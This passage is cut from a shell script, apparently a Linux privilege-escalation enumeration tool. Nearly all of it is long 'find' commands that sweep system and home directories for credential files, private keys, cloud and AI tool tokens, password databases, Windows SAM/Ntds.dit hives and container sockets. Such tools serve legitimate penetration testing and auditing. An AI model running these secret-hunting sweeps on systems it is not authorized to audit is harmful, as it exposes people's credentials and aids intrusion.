\".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 749 FIND_DIR_CACHE=`eval_bckgrd "find ${ROOT_FOLDER}.cache -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 750 FIND_DIR_CDROM=`eval_bckgrd "find ${ROOT_FOLDER}cdrom -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 751 FIND_DIR_ETC=`eval_bckgrd "find ${ROOT_FOLDER}etc -type d -name \"origin\" -o -name \".kube*\" -o -name \"k3s\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \"session.d\" -o -name \"containerd\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"crio\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"system-local.d\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"rke2\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"kube-proxy\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \"kubelet\" -o -name \"etcd\" -o -name \".cloudflared\" -o -name \"net.d\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"couchdb\" -o -name \"pam.d\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"system.d\" -o -name \"doctl\" -o -name \"environments\" -o -name \"wpa_supplicant\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \"k0s\" -o -name \"system-connections\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"kubernetes\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 752 FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 753 FIND_DIR_MEDIA=`eval_bckgrd "find ${ROOT_FOLDER}media -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 754 FIND_DIR_MNT=`eval_bckgrd "find ${ROOT_FOLDER}mnt -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 755 FIND_DIR_OPT=`eval_bckgrd "find ${ROOT_FOLDER}opt -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 756 FIND_DIR_PRIVATE=`eval_bckgrd "find ${ROOT_FOLDER}private -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 757 FIND_DIR_RUN=`eval_bckgrd "find ${ROOT_FOLDER}run -type d -name \"kubernetes.io\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 758 FIND_DIR_SBIN=`eval_bckgrd "find ${ROOT_FOLDER}sbin -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 759 FIND_DIR_SNAP=`eval_bckgrd "find ${ROOT_FOLDER}snap -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 760 FIND_DIR_SRV=`eval_bckgrd "find ${ROOT_FOLDER}srv -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 761 FIND_DIR_TMP=`eval_bckgrd "find ${ROOT_FOLDER}tmp -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 762 FIND_DIR_USR=`eval_bckgrd "find ${ROOT_FOLDER}usr -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \"session.d\" -o -name \"services\" -o -name \"system-services\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 763 FIND_DIR_VAR=`eval_bckgrd "find ${ROOT_FOLDER}var -type d -name \"origin\" -o -name \".kube*\" -o -name \"k3s\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"microk8s\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \"containerd\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"crio\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"rke2\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"kube-proxy\" -o -name \"kubernetes.io\" -o -name \"sentry\" -o -name \"mysql\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"kubelet\" -o -name \"etcd\" -o -name \".cloudflared\" -o -name \"net.d\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \"k0s\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"kubernetes\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 764 FIND_DIR_CONCOURSE_AUTH=`eval_bckgrd "find ${ROOT_FOLDER}concourse-auth -type d -name \"concourse-auth\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 765 FIND_DIR_CONCOURSE_KEYS=`eval_bckgrd "find ${ROOT_FOLDER}concourse-keys -type d -name \"concourse-keys\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 766 FIND_APPLICATIONS=`eval_bckgrd "find ${ROOT_FOLDER}applications -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 767 FIND_BIN=`eval_bckgrd "find ${ROOT_FOLDER}bin -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name 